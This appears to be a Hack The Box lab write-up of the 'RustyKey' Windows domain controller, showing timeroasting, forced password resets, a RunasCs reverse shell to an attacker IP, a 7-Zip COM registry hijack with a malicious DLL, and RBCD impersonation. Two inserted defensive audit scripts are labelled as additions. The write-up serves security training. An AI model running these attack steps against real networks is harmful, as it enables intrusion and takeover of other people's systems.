Hack-The-Box - Hard - Windows - RustyKey

Author: Yasir Mehmood

RustyKey is yet another assumed breach scenario wherein NTLM authentication is disabled but an older version of Kerberos is being utilized. Gathering Bloodhound data, I identified several targets, the first one being IT-Computer3$ which I could access through timeroasting. IT-Computer3$ was a member of the helpdesk group which can add and remove members from the protected objects group and change passwords for several accounts. I could remove the IT and support groups and gain access to 2 additional accounts: BB.MORGAN and EE.REED. I found a memo detailing additional access provided to members of the support team, including EE.REED, on archiving utilities. I utilized this as a hint to look at registry DLL paths for 7-zip which we can modify to point to an arbitrary DLL. When I pointed this to a malicious DLL, I gained access as MM.TURNER who we can use to conduct an RBCD attack.

| Machine Name | Platform | IP-Address | Difficulty | Machine Domain | Second Domain |
|---|---|---|---|---|---|
| RustyKey | Windows | 10.10.11.75 | Hard | rustykey.htb | dc.rustykey.htb |
Enumeration
- I performed an initial Nmap scan and got the following results:
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo nmap -sC -sV 10.10.11.75
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 21:02 CEST
Nmap scan report for 10.10.11.75
Host is up (0.029s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 03:02:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open LDAP Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open LDAP Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-29T03:02:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds
- I then added the IP address to the /etc/hosts file on the attacker system.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo "10.10.11.75 DC rustykey.htb" | sudo tee -a /etc/hosts
10.10.11.75 DC rustykey.htb
- This machine was an assumed breach scenario, as it usually is with the Windows machines.

- When attempting to authenticate to LDAP, I received a STATUS NOT SUPPORTED error.
- This indicates that NTLM, the default authentication method, is disabled.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec smb rustykey.htb -u rr.parker -p '8#t5HE8L!W3A'
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
- I then decided to set up and use the Kerberos authentication method.
- Firstly, I generated a krb5.conf file using the guide written by 0xBEN.
- Afterwards, I exported the file as the main configuration file and initiated an authentication.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5_CONFIG=/home/kali/HTB/RustKey/custom_krb5.conf
kinit rr.parker
Password for rr.parker@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled
- I then double-checked the Kerberos authentication by running klist.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: rr.parker@RUSTYKEY.HTB
Valid starting Expires Service principal
06/29/2025 09:18:42 06/29/2025 19:18:42 krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB
renew until 06/30/2025 09:18:38
- I then exported the KRB5CCNAME variable to have the value of the TGT ticket that we got through this process, which we can find in the /tmp directory.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000
- This step is actually unnecessary as kinit should set the environment variable by default.
- But since I was messing around with a bunch of TGTs, I had to export this environment variable.
- Then, I authenticated to LDAP using Kerberos and the exported kcache, and it was successful.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec LDAP rustykey.htb -k --use-kcache
LDAP rustykey.htb 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP rustykey.htb 389 DC [+] rustykey.htb\rr.parker from ccache
- I then used netexec to grab some data for the bloodhound tool's enumeration.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec LDAP rustykey.htb -k --use-kcache --dns-server 10.10.11.75 --bloodhound -c all
LDAP rustykey.htb 389 DC [*] None (name:DC) (domain:rustykey.htb)
.... < SNIPPING LONG OUTPUT STREAM > ....
LDAP rustykey.htb 389 DC Compressing output into /home/kali/.nxc/logs/DC_rustykey.htb_2025-06-29_145025_bloodhound.zip
- Looking at the bloodhound data, I couldn't find any direct ACLs that were exploitable.
- It looked like the main goal was to get access as the NN.MARCOS user, who was a member of the Helpdesk group.
- The Helpdesk group had permission to Force Change Password on several users.
- Some of the users in question were members of the Remote Management Users and the Protected Objects groups.

- I then started performing enumeration on the Helpdesk group in question.
- It was found that the it-computer3 account had addSelf permission over the Helpdesk group.

Initial Access
- Since it's not a pre-2000-compatible-windows group member, the only other option available to check on this computer account is to do some form of roasting.
- One particular method stands out for computer accounts, which is timeroasting. I decided to use timeroast.py to conduct this attack.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timeroast.py 10.10.11.75 | tee ntp-hashes.txt
[sudo] password for kali:
1000:$sntp-ms$673deff65ba0b936f611053f3bead102$1c0111e900000000000a1b344c4f434cec0b2af884ffce81e1b8428bffbfcd0aec0b4ed624ffbc0dec0b4ed624ffd892
1104:$sntp-ms$da9a7a30f696e17bb4b4731865fb1b43$1c0111e900000000000a1b344c4f434cec0b2af8829b7d9fe1b8428bffbfcd0aec0b4ed6d2bc3321ec0b4ed6d2bc4a9e
1103:$sntp-ms$c54e367acabfdf8ae049616c06516c60$1c0111e900000000000a1b344c4f434cec0b2af8829b0178e1b8428bffbfcd0aec0b4ed6d2bbb044ec0b4ed6d2bbd1d2
1105:$sntp-ms$13b40597252d73a45e01cb98399496b0$1c0111e900000000000a1b344c4f434cec0b2af8829bba05e1b8428bffbfcd0aec0b4ed6d6935836ec0b4ed6d693a3b6
1106:$sntp-ms$0eeaa19ae46e8b15a32cd631b73bcce6$1c0111e900000000000a1b344c4f434cec0b2af8843916a2e1b8428bffbfcd0aec0b4ed6d830b82eec0b4ed6d830f99d
1107:$sntp-ms$5039dbb0876228e38dc2f241064e3fe3$1c0111e900000000000a1b344c4f434cec0b2af885bed817e1b8428bffbfcd0aec0b4ed6d9b677f6ec0b4ed6d9b6c01b
1121:$sntp-ms$e4e780762ee1e408b365049937c9e035$1c0111e900000000000a1b354c4f434cec0b2af884acc921e1b8428bffbfcd0aec0b4ed6ec9c4545ec0b4ed6ec9c779a
1120:$sntp-ms$7a0907455dad90ca9538a7f175d94dca$1c0111e900000000000a1b354c4f434cec0b2af884a9ebf7e1b8428bffbfcd0aec0b4ed6ec9973d9ec0b4ed6ec999715
1118:$sntp-ms$a27dee3aad3c978ed6c52a603026e7fd$1c0111e900000000000a1b354c4f434cec0b2af8848f6639e1b8428bffbfcd0aec0b4ed6ec7ef680ec0b4ed6ec7f0c4f
1119:$sntp-ms$855ad8d96730a4e5fa6b3492378e52b4$1c0111e900000000000a1b354c4f434cec0b2af884924a19e1b8428bffbfcd0aec0b4ed6ec81c999ec0b4ed6ec81f538
1122:$sntp-ms$ff95d282096729712b1275fbb39a814d$1c0111e900000000000a1b354c4f434cec0b2af883f81f60e1b8428bffbfcd0aec0b4ed6f0001e32ec0b4ed6f0006804
1123:$sntp-ms$fd93afeae388bba24361afbd791d6dcd$1c0111e900000000000a1b354c4f434cec0b2af883f92a22e1b8428bffbfcd0aec0b4ed6f0013d16ec0b4ed6f0016dbe
1125:$sntp-ms$c1a103e9a3cc75e7a525ee1f07663272$1c0111e900000000000a1b354c4f434cec0b2af883099905e1b8428bffbfcd0aec0b4ed6f32a411cec0b4ed6f32a6e68
1124:$sntp-ms$f470bb24f1a392e4a54b937dc3e71b07$1c0111e900000000000a1b354c4f434cec0b2af88308a5c0e1b8428bffbfcd0aec0b4ed6f3294573ec0b4ed6f3297cd1
1127:$sntp-ms$888e560b0110dcdd8f8c7875d2ac570a$1c0111e900000000000a1b354c4f434cec0b2af8827235a7e1b8428bffbfcd0aec0b4ed6f669e9a8ec0b4ed6f66a16f5
1126:$sntp-ms$a561e867a6d41b1f24759f7e3488f568$1c0111e900000000000a1b354c4f434cec0b2af88271913ce1b8428bffbfcd0aec0b4ed6f6692c13ec0b4ed6f6697c9b
.... < SNIPPING LONG OUTPUT STREAM > ....
- I was able to pinpoint the relevant hash because of the rid-brute attack conducted earlier.
- The most relevant hash was 1125 as it was the RID of IT-COMPUTER3.
- I then used the bundled tool timecrack, found in the same repository, to crack the hashes.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timecrack.py ../ntp_hashes.txt rockyou_clean.txt
[+] Cracked RID 1125 password: [REDACTED]
- I was able to recover the credentials for the it-computer3$ account.
- The next step was to add our controlled computer account to the Helpdesk group.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k add groupMember Helpdesk it-computer3$
[+] it-computer3$ added to Helpdesk
- After successfully adding the it-computer3$ user to the Helpdesk group, I used the getTGT script from impacket to get its TGT ticket.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getTGT 'RUSTYKEY.HTB/it-computer3$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in it-computer3$.ccache
Lateral Movement #1
- After enumeration of the Protected Objects, I saw that most of the users were in that group.
- This meant that even after resetting their passwords, authentication would not be successful.
- This is because to authenticate as a user that is a member of Protected Objects, their TGT ticket is required.
- However, in this case, I was able to AddMembers to the Protected Objects.
- This exploit isn't too useful on its own, but this permission also allows you to remove members.
- I decided to remove the IT group from the Protected Objects using the BloodyAD tool.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" IT
[-] IT removed from Protected Objects
- Removing the IT group from Protected Objects allowed me to reset the password for the bb.morgan user.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password bb.morgan Wild1234!
[+] Password changed successfully!
- After which, I was able to authenticate as the bb.morgan user through the kinit utility.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo 'Wild1234!' | kinit bb.morgan
Password for bb.morgan@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled
- Since the bb.morgan user was a member of the Remote Management Users group, it allowed me to get a WinRM shell.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ Evil-WinRM -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/Evil-WinRM#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> dir ../Desktop
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 7/10/2025 7:02 PM 34 user.txt
- I was able to gain access as the bb.morgan user and also found a PDF on the Desktop.
Lateral Movement #2
- Transferring the pdf file over to the attacker system, I was able to read the following email.
Internal Memo
From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100
Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow testing and
troubleshooting of file archiving features across shared workstations. This is mainly to help streamline ticket
resolution related to extraction/compression issues reported by the Finance and IT teams. Some newer systems handle
context menu actions differently, so registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed stable in all
environments.
- Let DevOps know if you encounter access errors or missing shell actions.
Thanks,
BB Morgan
IT Department
- It looked like a memo to inform that support team members, including ee.reed, had access to archiving tools.
- The memo also mentioned that there could be registry level adjustments during this phase as well.
- This indicated that support might have access to modify the registry related to the archiving tools.
- Therefore, the current target is ee.reed. I first removed the Support group from Protected Objects.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" SUPPORT
[-] SUPPORT removed from Protected Objects
- I was then able to change the password for the ee.reed user, since his group is no longer part of the Protected Objects.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password ee.reed 'Wild1234!'
[+] Password changed successfully!
- However, I was still unable to authenticate using WinRM, LDAP, or SMB based authentication methods.
- So instead, I used the RunasCs tool, created by @antonioCoco.
*Evil-WinRM* PS C:\Windows\Temp> ./RunasCs.exe ee.reed Wild1234! cmd.exe -r 10.10.16.75:3232
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-46cab11$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3264 created in background.
- I was successfully able to receive the reverse shell on the netcat listener.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 3232
listening on [any] 3232 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
PS C:\Users> whoami
rustykey\ee.reed
Privilege Escalation
- Having found that the members of the support group (such as ee.reed) have privileges on the Registry, I decided to enumerate and perform privilege escalation via the Registry Hives.
- I then used the following script to check for writeable DLL paths in the Registry.
PS C:\Windows\system32> Get-ChildItem HKLM:\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
>> try {
>> $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\', '')
>> $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
>> $regKey.SetValue('TestWrite','1')
>> $regKey.DeleteValue('TestWrite')
>> $true
>> } catch {
>> $false
>> }
>> }
Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
Name Property
---- --------
{23170F69-40C1-278A-1000-000100020000} (default) : 7-Zip Shell Extension
Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
Name Property
---- --------
InprocServer32 (default) : C:\Program Files\7-Zip\7-zip.dll
ThreadingModel : Apartment
- I was then able to alter the (default) value of the InprocServer32 key in the below hive.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
- I then used this misconfiguration/vulnerability to change this into a malicious .dll.
PS C:\Windows\Tasks> Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\Windows\Tasks\w.dll"
PS C:\Windows\Tasks> Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"
(default) : C:\Windows\Tasks\w.dll
ThreadingModel : Apartment
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
PSChildName : InprocServer32
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
- After making the required changes, I had to wait for about a minute to receive a reverse shell connection.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>whoami
whoami
rustykey\mm.turner
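The write probe used above creates and deletes a TestWrite value under every key it can open. For auditing the same misconfiguration, the following added example (not part of the original write-up) reads the ACL of each InprocServer32 key instead and reports non-default principals that could repoint the DLL; the function name and the trusted-SID baseline are assumptions.

```powershell
# Added example: read-only ACL audit of COM InprocServer32 registrations.
# Nothing is written to the registry.

# Assumed baseline of principals expected to hold write access.
$TrustedSids = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-3-0',       # CREATOR OWNER
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # NT SERVICE\TrustedInstaller
)

# Rights that let a principal repoint or replace the registration. WriteKey is
# avoided as a mask because it shares the ReadPermissions bit with ReadKey.
$WriteMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
$GenericMask = 0x50000000  # GENERIC_WRITE (0x40000000) combined with GENERIC_ALL (0x10000000)

function Get-WritableInprocServer {
    param([string]$Root = 'HKLM:\SOFTWARE\Classes\CLSID')

    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($clsid in Get-ChildItem -LiteralPath $Root -ErrorAction SilentlyContinue) {
        $path = "$($clsid.PSPath)\InprocServer32"
        if (-not (Test-Path -LiteralPath $path)) { continue }
        try {
            $acl = Get-Acl -LiteralPath $path -ErrorAction Stop
        } catch {
            continue   # key not readable by the auditing account
        }
        $dll = (Get-ItemProperty -LiteralPath $path -ErrorAction SilentlyContinue).'(default)'

        foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Inherit-only ACEs apply to child keys, not to this key itself.
            if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
            $sid = $ace.IdentityReference.Value
            if ($TrustedSids -contains $sid) { continue }
            $rights = [int]$ace.RegistryRights
            if (-not (($rights -band $WriteMask) -or ($rights -band $GenericMask))) { continue }
            try {
                $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value
            } catch {
                $name = $sid   # orphaned or unresolvable SID
            }
            [pscustomobject]@{
                Key      = $path -replace '^.*::', ''
                Dll      = $dll
                Identity = $name
                Rights   = $ace.RegistryRights
            }
        }
    }
}

Get-WritableInprocServer | Sort-Object Key, Identity | Format-Table -AutoSize -Wrap
```

On a host configured like the one in this write-up, the 7-Zip shell extension CLSID would be expected to appear with the group that was granted registry access listed under Identity.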
- I then discovered through bloodhound that the mm.turner user was a member of the Delegationmanagers group.
- Which meant this user could act on the behalf of the Domain Controller (DC).
- Firstly, I set PrincipalsAllowedToDelegateToAccount on the DC$ account so that the IT-Computer3$ account is allowed to delegate to it.
PS C:\Windows> Set-ADComputer DC$ -PrincipalsAllowedToDelegateToAccount 'it-computer3$'
PS C:\Windows> Get-ADComputer DC$ -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName : dc.rustykey.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName :
- The next step of RBCD is to obtain a Service Ticket, and I did just that.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getST -spn "CIFS/dc.rustykey.htb" -impersonate backupadmin -dc-ip 10.10.11.75 "rustykey.htb/rr.parker:'8#t5HE8L!W3A'"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
/home/kali/.local/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/home/kali/.local/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache
- After getting the ccache file, I then performed a check for authentication.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=$(pwd)/backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec smb dc.rustykey.htb -k -u backupadmin --use-kcache -X "dir C:\Users\Administrator\Desktop"
SMB DC.rustykey.htb 445 DC [*] x64 (name:DC) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.rustykey.htb 445 DC [+] rustykey.htb\backupadmin from ccache (Pwn3d!)
SMB DC.rustykey.htb 445 DC [+] Executed command via wmiexec
SMB DC.rustykey.htb 445 DC Directory: C:\Users\Administrator\Desktop
SMB DC.rustykey.htb 445 DC Mode LastWriteTime Length Name
SMB DC.rustykey.htb 445 DC ---- ------------- ------ ----
SMB DC.rustykey.htb 445 DC -ar--- 7/10/2025 7:02 PM 34 root.txt
.... < SNIPPING LONG OUTPUT STREAM > ....
- As can be seen in the above output, I was able to execute commands as the DC$.
- Which meant that the Season 8 - Rustykey Machine on Hack-The-Box was now complete.
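The RBCD step above depends on two things a defender can enumerate: a populated PrincipalsAllowedToDelegateToAccount on a computer object, and a privileged account that may still be impersonated through delegation. The following is an added example, not part of the original write-up; the function names are assumptions and it needs the ActiveDirectory (RSAT) module.

```powershell
# Added example: read-only audit of resource-based constrained delegation (RBCD).
Import-Module ActiveDirectory

function Get-RbcdDelegation {
    # Distinguished names of all domain controller computer objects.
    $dcDns = @(Get-ADDomainController -Filter * | ForEach-Object ComputerObjectDN)

    # Every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties PrincipalsAllowedToDelegateToAccount, whenChanged |
        ForEach-Object {
            [pscustomobject]@{
                Target             = $_.SamAccountName
                IsDomainController = $dcDns -contains $_.DistinguishedName
                AllowedToDelegate  = $_.PrincipalsAllowedToDelegateToAccount -join '; '
                # whenChanged covers any change to the object, not only this attribute.
                WhenChanged        = $_.whenChanged
            }
        }
}

function Get-DelegatablePrivilegedUser {
    # Enabled adminCount=1 accounts that can still be impersonated via S4U:
    # not marked "sensitive and cannot be delegated" and not in Protected Users.
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive |
        ForEach-Object DistinguishedName)

    Get-ADUser -LDAPFilter '(adminCount=1)' -Properties AccountNotDelegated |
        Where-Object {
            $_.Enabled -and
            -not $_.AccountNotDelegated -and
            $protected -notcontains $_.DistinguishedName
        } |
        Select-Object SamAccountName, DistinguishedName
}

# Delegation entries on domain controllers deserve the first look.
Get-RbcdDelegation | Sort-Object IsDomainController -Descending | Format-Table -AutoSize -Wrap
Get-DelegatablePrivilegedUser | Format-Table -AutoSize
```

An unexpected entry can be cleared with `Set-ADComputer <name> -PrincipalsAllowedToDelegateToAccount $null`.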
